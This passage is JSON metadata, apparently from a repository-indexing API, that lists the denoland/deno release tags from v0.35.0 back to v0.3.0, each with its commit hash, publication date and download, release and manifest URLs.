sts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/